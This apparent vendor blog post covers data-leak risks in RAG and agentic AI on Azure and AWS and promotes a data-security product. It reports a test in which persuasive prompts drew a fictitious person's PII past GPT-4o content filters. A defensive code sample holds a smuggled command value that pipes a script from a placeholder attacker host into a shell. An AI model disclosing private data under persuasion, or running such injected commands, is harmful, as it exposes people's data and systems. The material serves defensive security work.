Overview

Data is the lifeblood of modern enterprise applications. Large volumes of data have enabled modern businesses to generate business insights, improve ROI, and deliver customer excellence. However, these insights and ROI benefits rely heavily on business-sensitive information. In fact, according to a survey conducted by the Cloud Security Alliance, 89% of organizations store business-sensitive data or workloads in the public cloud. Until recently, most of these insights and analytics were powered by machine learning over well-labelled data that was part of a strictly controlled data set, with a reasonable understanding of the entity relationships in the data.

That was until we got large language models (LLMs). One of the challenges with LLMs is that they can be unpredictable. In most cases, their responses are designed to be non-deterministic, making them more interesting and, dare I say, human-like. A side effect of these non-deterministic responses is that they can be factually incorrect. In the world of LLMs, these are known as hallucinations. To mitigate hallucinations, LLMs are effectively told to fact-check their responses against a known data set (also known as a knowledge base). This fact-checking process is known as retrieval-augmented generation, or RAG. RAG works by retrieving search results from a vector database based on keywords and artifacts detected in the user prompt. The chunks of text retrieved from the RAG database help the LLM improve the accuracy of its responses and act as a bounding parameter for the LLM.

Figure 1: GenAI application integrated with RAG (Image Source: AWS)

A RAG database is typically built on top of unstructured or structured enterprise data, such as PDFs, Word documents, Excel sheets, etc.

Figure 2: Sensitive data transactions to Azure AI Foundry

Sensitive data is rapidly moving into these services. Zscaler’s inline GenAI DLP capabilities detected over 53.7M sensitive data transactions to Azure AI Foundry within the last three months alone.

Key Security Challenges of RAG

Accidental Data Exposure

Improper sanitization of data when feeding it into a RAG database can result in complete exposure of sensitive data. Our research found that, depending on the foundation model chosen and the type of vector database, the CSP-provided guardrails are largely susceptible to prompt injection and manipulation.

Here is a real-world example of what happens when you attach sensitive data to a RAG database. To test this, we created a RAG database about a fictitious persona, “Johnson White”, including a significant amount of PII and highly confidential personal information, attached it to our Azure AI Search instance, and then mapped it to our OpenAI GPT-4o deployment in Azure AI Foundry (the sketch below shows the general wiring).
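For readers who want to see the moving parts, here is a minimal sketch of the pattern behind a setup like ours: an Azure AI Search index attached to a GPT-4o chat deployment via the Azure OpenAI "on your data" extension. The endpoint, key, index, and prompt below are placeholders rather than our actual test environment, and the exact request schema can vary by API version. The important point is that whatever the index returns is injected into the model's context before it answers.

```python
# Hypothetical sketch: attach an Azure AI Search index as a RAG source for a
# GPT-4o deployment using the Azure OpenAI "on your data" extension.
# All endpoints, keys, and names below are placeholders.
from openai import AzureOpenAI

client = AzureOpenAI(
    azure_endpoint="https://<your-aoai-resource>.openai.azure.com",
    api_key="<AZURE_OPENAI_KEY>",
    api_version="2024-02-15-preview",
)

response = client.chat.completions.create(
    model="gpt-4o",  # the Azure deployment name
    messages=[{"role": "user", "content": "What do we know about Johnson White?"}],
    extra_body={
        "data_sources": [
            {
                "type": "azure_search",
                "parameters": {
                    "endpoint": "https://<your-search-service>.search.windows.net",
                    "index_name": "<rag-index>",
                    "authentication": {"type": "api_key", "key": "<SEARCH_KEY>"},
                },
            }
        ]
    },
)

# Retrieved chunks are grounded into the model's answer: if the index holds
# unsanitized PII, the content filter is the only control standing between
# that data and the response.
print(response.choices[0].message.content)
```

Nothing in this wiring distinguishes sensitive chunks from harmless ones; the filtering burden falls entirely on the guardrails applied to the model's output.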
Depending on the content filter (guardrails) chosen, we got mixed results.

Default out-of-the-box content filter:

Figure 3: Response from GPT-4o with default content filter

In the above scenario, the PII is requested initially by directly querying for the credit card data. The guardrails kick in, but after some mild persuasion in the prompt, the data starts to trickle out, exposing key sensitive information including PII and PCI data.

After increasing the sensitivity thresholds for the guardrails:

Figure 4: Response from GPT-4o with enhanced guardrails

While we barely had to manipulate the prompts with the default content filter, we had to get slightly more creative for the v2 filter, which did block data such as credit card numbers from being revealed. However, in both cases, a significant amount of PII leaked out.

💡 Key takeaway: The best way to protect your GenAI data is to make sure it does not reach the AI services in the first place! Prompt filters and guardrails are not bullet-proof.

Data authorization issues: Cloud providers offer highly granular IAM access control mechanisms for data stores, and enterprise security workflows are usually built around access governance of those stores. However, the scenario above raises additional data authorization headaches for organizations: the same LLM could be leveraged by a person who has no direct access to the data to obtain transient access to it via the LLM’s inference endpoints.

Figure 5: Indirect data exposure and authorization bypass

Data poisoning: If the source data embedded in the LLM’s knowledge base is injected with malicious content, the results produced will most likely be malicious as well, and could lead to further AI supply chain attacks and risks.

Data boundary: The RAG data is not limited to your public cloud data stores. For example, AWS Bedrock allows you to connect multiple enterprise SaaS applications as data sources for your knowledge base.

Figure 6: Cross-exposure of sensitive data via third-party integrations

Cross-exposure of sensitive data via RAG knowledge bases can result in unintended disclosure of sensitive data without the organization realizing where the data is leaking from.

In short, RAG introduces several weaknesses that can completely compromise the integrity of an AI system.

Combining RAG with AI Agents

As we navigate the AI landscape, the attack primitives get even more interesting with the introduction of AI agents. Gartner predicts that by 2028, one-third of GenAI interactions will use action models and agents to complete tasks, introducing actionability beyond the traditional chatbot. AI agents extend the LLM’s core capabilities by introducing additional toolsets that the LLM can leverage to perform actionable tasks. We are not only giving LLMs the ability to reach enterprise data, but also the ability to take user input and execute code! With AI agents, all roads lead to potential sensitive data.

With AWS Bedrock, for example, agents can execute Lambda functions to perform additional tasks, and while executing such tasks, parameters are passed back and forth between the agent and the Lambda function. If proper care is not taken, this can result in code injection and execution, as the sketch below illustrates.
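To make the risk concrete, here is a simplified, hypothetical sketch of a Lambda handler backing a Bedrock agent action group. The event and response shapes are abbreviated, and the report command is a stand-in; the point is that agent-supplied parameters ultimately originate from user prompts and retrieved content, so they must be treated as untrusted input and never reach a shell, eval, or query builder unvalidated.

```python
# Hypothetical action-group Lambda for a Bedrock agent (event shape simplified).
# Agent-supplied parameters are derived from user prompts and RAG content,
# so they must be treated as untrusted input.
import subprocess

ALLOWED_REPORTS = {"daily", "weekly", "monthly"}  # allow-list of expected values

def lambda_handler(event, context):
    # Bedrock agents pass parameters as a list of {"name": ..., "value": ...} items.
    params = {p["name"]: p["value"] for p in event.get("parameters", [])}
    report_type = params.get("report_type", "")

    # UNSAFE: building a shell command from the raw parameter invites injection,
    # e.g. report_type = "daily; curl https://attacker.example/x | sh"
    # subprocess.run(f"generate-report {report_type}", shell=True)

    # Safer: validate against an allow-list and avoid shell interpretation.
    if report_type not in ALLOWED_REPORTS:
        return _agent_response(event, "Rejected: unsupported report type.")
    # "generate-report" is a placeholder for whatever tool the action invokes.
    subprocess.run(["generate-report", report_type], check=False)

    return _agent_response(event, f"Started {report_type} report.")

def _agent_response(event, text):
    # Minimal response envelope returned to the agent (fields simplified).
    return {
        "messageVersion": event.get("messageVersion", "1.0"),
        "response": {
            "actionGroup": event.get("actionGroup"),
            "function": event.get("function"),
            "functionResponse": {"responseBody": {"TEXT": {"body": text}}},
        },
    }
```

The same validation discipline applies to any parameter the agent forwards, whether it ends up in a command, a SQL query, or another downstream API call.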
The threat model below highlights the potential risks associated with the various entities that make up an AI agent.

Figure 7: Threat model for agentic RAG systems

Defending Against AI-Driven Data Risks Using Zscaler DSPM

Zscaler’s DSPM solution helps customers understand the reach of AI services into their cloud data stores that might contain sensitive data.

Visibility into and control over AI data in motion

Zscaler customers can discover and enforce control over the usage of private instances of GenAI cloud services in real time by leveraging the Zscaler Zero Trust Exchange™.

Figure 8: GenAI dashboard to track sensitive AI data flows

Customers can cut off sensitive data at the source by applying effective inline controls that block and isolate attempts to upload sensitive data into AI workloads in the public cloud.

Visibility and Risk Assessment of Sensitive Data Exposed to GenAI at Rest in the Public Cloud

AI dashboards help customers understand the various AI services deployed in their cloud environment and what data those services can access. The dashboard also provides visibility into the types of sensitive data potentially exposed to these services.

Figure 9: AI Data Exposure Dashboard in the public cloud

Out-of-the-box policies correlating AI posture and data exposure

Out-of-the-box policies correlate the exposure of sensitive data to AI agents, the usage of foundation models, their knowledge bases, and the knowledge base data sources.

Figure 10: AI Data Exposure and risk correlation policies

Drill down to understand the AI access path and identify overprivileged access

Zscaler’s robust data entitlement capabilities give you visibility into direct and indirect AI access. Customers can easily drill down into their cloud data stores to visualize what sensitive data the AI services can access and through which paths.

Figure 11: AI data access path for intuitive investigations

In conclusion, data security for IaaS, PaaS, and SaaS, covering both data at rest and data in motion, is a critical enabler for the secure adoption of GenAI capabilities. For a deeper understanding of how Zscaler can empower your organization to navigate AI security challenges and elevate cloud data security, we invite you to schedule a comprehensive, tailored 1-on-1 demonstration of our solutions that deliver real, actionable results.
